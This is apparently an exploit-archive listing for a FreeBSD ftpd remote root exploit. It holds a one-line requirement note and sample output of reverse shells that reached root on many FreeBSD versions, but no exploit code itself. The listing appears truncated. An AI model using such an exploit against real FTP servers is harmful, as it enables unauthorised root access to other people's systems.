Full title: FreeBSD ftpd Remote Root Exploit
Category: remote exploits
Platform: freebsd

needs user account inside a chroot.
'''
example reverse shells:

[root@r00tbox /]# uname -a;id;
uname -a;id;
FreeBSD r00tbox 10.0-RELEASE FreeBSD 10.0-RELEASE #0 r260789: Thu Jan 16 22:34:59 UTC 2014 root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel)
[root@r00tbox /]#

# uname -a;id;
FreeBSD r00tbox 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 03:51:29 UTC 2016 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC i386
uid=0(root) gid=0(wheel) groups=0(wheel)

# uname -a;id;
FreeBSD r00tbox 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel)

# uname -a;id;
FreeBSD r00tbox 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Thu Jul 10 23:44:39 UTC 2014 root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel)

#uname -a;id;
FreeBSD r00tbox 9.2-RELEASE FreeBSD 9.2-RELEASE #0 r255898: Thu Sep 26 22:50:31 UTC 2013 root@bake.isc.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel)

Ncat: Connection from 192.168.178.46:50444.
sh: can't access tty; job control turned off
# uname -a;id;
FreeBSD r00tbox 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel)
#

sh: can't access tty; job control turned off
# uname -a;id;
FreeBSD xxx.hostname 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 05:25:24 UTC 2010 root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2)

sh: can't access tty; job control turned off
# uname -a;
FreeBSD r00tbox.fritz.box 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Thu Jan 1 08:58:24 UTC 2009 root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

sh: can't access tty; job control turned off
# uname -a;id;
FreeBSD r00tbox.fritz.box 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 08:21:48 UTC 2008 root@palmer.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2)
#

# uname -a;
FreeBSD r00tbox.fritz.box 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 11:43:51 UTC 2008 root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
# id
uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2)
# uname -a;id;
FreeBSD r00tbox.fritz.box 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:18:52 UTC 2008 root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=0(root) gid=0(wheel) groups=0(wheel),1003(test2)
#

0day.today @ http://0day.today/